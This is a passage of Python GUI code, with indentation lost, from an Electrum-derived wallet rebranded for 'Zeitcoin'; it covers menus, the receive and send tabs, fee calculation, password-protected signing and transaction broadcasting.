file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&New contact"), self.new_contact_dialog)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.mpk_menu = wallet_menu.addAction(_("&Master Public Keys"), self.show_master_public_keys)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addAction(_("&Export History"), self.export_history_dialog)
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
wallet_menu.addAction(_("Addresses"), self.toggle_addresses_tab).setShortcut(QKeySequence("Ctrl+A"))
tools_menu = menubar.addMenu(_("&Tools"))
# "Settings"/"Preferences" are reserved menu names on OS X; use a different label there as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.run_network_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('zeitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Zeitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Zeitcoin system."))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the notifications if three or more new transactions arrived
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received. Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
# iterate over a copy: items are removed from the list inside the loop
for tx in list(self.tx_notifications):
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received. %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
fileName = unicode( QFileDialog.getOpenFileName(self, title, directory, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
path = os.path.join( directory, filename )
fileName = unicode( QFileDialog.getSaveFileName(self, title, path, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
self.connect(sender, QtCore.SIGNAL('timersignal'), self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = run_hook('format_amount_and_units', amount)
if text and x:
text += ' (%s)'%x
return text
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 8:
return 'ZEIT'
raise Exception('Unknown base unit')
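# Refresh the status bar text, tray tooltip and network icon: offline,
# synchronizing, lagging behind the server, or the current balance.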
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price from exchange rate plugin
rate = run_hook('get_fiat_status_text', c + u + x)
if rate:
text += rate
icon = QIcon(":icons/status_connected.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from history_list import HistoryList
self.history_list = l = HistoryList(self)
return l
def show_address(self, addr):
import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Zeitcoin address where the payment should be received. Note that each payment request uses a different Zeitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.expires_combo = QComboBox()
self.expires_combo.addItems(map(lambda x:x[0], expiration_values))
self.expires_combo.setCurrentIndex(1)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Zeitcoin addresses.'),
_('The Zeitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = req.get('sig').decode('hex')
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
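# If an OpenAlias is configured and its address belongs to this wallet, sign
# the payment request with that address (prompting for the password first).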
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text())
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = map(lambda x: x[1], expiration_values)[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(str(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
from electrum.wallet import Imported_Wallet
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_unused_address()
self.receive_address_e.setText(addr if addr else '')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.tabs.setCurrentIndex(2)
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
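# Rebuild the payment URI from the current address/amount/message, update the
# inline QR widget and, if open, the detached QR window.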
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text()).encode('utf8')
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Zeitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Zeitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.max_button = EnterButton(_("Max"), self.spend_max)
hbox = QHBoxLayout()
hbox.addWidget(self.max_button)
hbox.addStretch(1)
grid.addLayout(hbox, 4, 3)
msg = _('Zeitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
self.fee_slider = QSlider(Qt.Horizontal, self)
self.fee_slider.setRange(0, 4)
self.fee_slider.setToolTip('')
def slider_moved():
from electrum.util import fee_levels
pos = self.fee_slider.sliderPosition()
self.config.set_key('fee_level', pos, False)
self.spend_max() if self.is_max else self.update_fee()
tooltip = fee_levels[pos]
if self.network:
dynfee = self.network.dynfee(pos)
if dynfee:
tooltip += '\n' + self.format_amount(dynfee) + ' ' + self.base_unit() + '/kB'
QToolTip.showText(QCursor.pos(), tooltip, self.fee_slider)
self.fee_slider.valueChanged.connect(slider_moved)
self.fee_slider.setValue(self.config.get('fee_level', 2))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.rbf_checkbox = QCheckBox(_('Replaceable'))
msg = [_('If you check this box, your transaction will be marked as non-final,'),
_('and you will have the possibility, while it is unconfirmed, to replace it with a transaction that pays a higher fee.'),
_('Note that some merchants do not accept non-final transactions until they are confirmed.')]
self.rbf_checkbox.setToolTip('<p>' + ' '.join(msg) + '</p>')
self.rbf_checkbox.setVisible(self.config.get('use_rbf', False))
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_e, 5, 1)
grid.addWidget(self.fee_slider, 5, 1)
grid.addWidget(self.rbf_checkbox, 5, 2)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 2)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.amount_e.textEdited.connect(self.reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = RED_FG, RED_FG
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = BLACK_FG, BLACK_FG
elif self.amount_e.isModified():
amt_color, fee_color = BLACK_FG, BLUE_FG
else:
amt_color, fee_color = BLUE_FG, BLUE_FG
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color)
self.fee_e.setStyleSheet(fee_color)
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
# Defer this until grid is parented to avoid ugly flash during startup
self.update_fee_edit()
run_hook('create_send_tab', grid)
return w
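# 'Max' button / '!' shortcut: send everything spendable from the selected
# coins, keeping a manually entered fee if the fee field was modified.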
def spend_max(self):
inputs = self.get_coins()
sendable = sum(map(lambda x:x['value'], inputs))
fee = self.fee_e.get_amount() if self.fee_e.isModified() else None
r = self.get_payto_or_dummy()
amount, fee = self.wallet.get_max_amount(self.config, inputs, r, fee)
if not self.fee_e.isModified():
self.fee_e.setAmount(fee)
self.amount_e.setAmount(amount)
self.not_enough_funds = (fee + amount > sendable)
# emit signal for fiat_amount update
self.amount_e.textEdited.emit("")
self.is_max = True
def reset_max(self):
self.is_max = False
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
fee = None if self.not_enough_funds else self.wallet.get_tx_fee(tx)
self.fee_e.setAmount(fee)
def update_fee_edit(self):
b = self.config.get('dynamic_fees', True)
self.fee_slider.setVisible(b)
self.fee_e.setVisible(not b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, domain = None):
self.pay_from = [] if domain == [] else self.wallet.get_spendable_coins(domain)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:8] + '...' + h[-8:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
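# Decorator used below (e.g. on sign_tx and show_seed_dialog) for actions that
# need the wallet password; the wrapped method receives it as the 'password'
# keyword argument.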
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
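# Gather outputs, fee, label and coins from the Send tab. Any validation
# problem shows an error and returns None implicitly.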
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = unicode( self.message_e.text() )
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs()
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.') % alias + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Zeitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Zeitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee = self.fee_e.get_amount()
if fee is None:
self.show_error(_('Invalid Fee'))
return
coins = self.get_coins()
return outputs, fee, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
amount = sum(map(lambda x:x[2], outputs))
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
use_rbf = self.rbf_checkbox.isChecked()
if use_rbf:
tx.set_sequence(0)
if tx.get_fee() < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
confirm_amount = self.config.get('confirm_amount', COIN)
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
extra_fee = run_hook('get_additional_fee', self.wallet, tx)
if extra_fee:
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(extra_fee) )
if tx.get_fee() >= self.config.get('confirm_fee', 100000):
msg.append(_('Warning')+ ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
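# Broadcasting runs in a non-GUI thread via WaitingDialog. If the transaction
# pays a payment request, the invoice is marked as paid and a payment ACK with
# a refund address is sent back to the requestor.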
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
pr.set_paid(tx.hash())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.hash(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.tabs.setCurrentIndex(1)
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
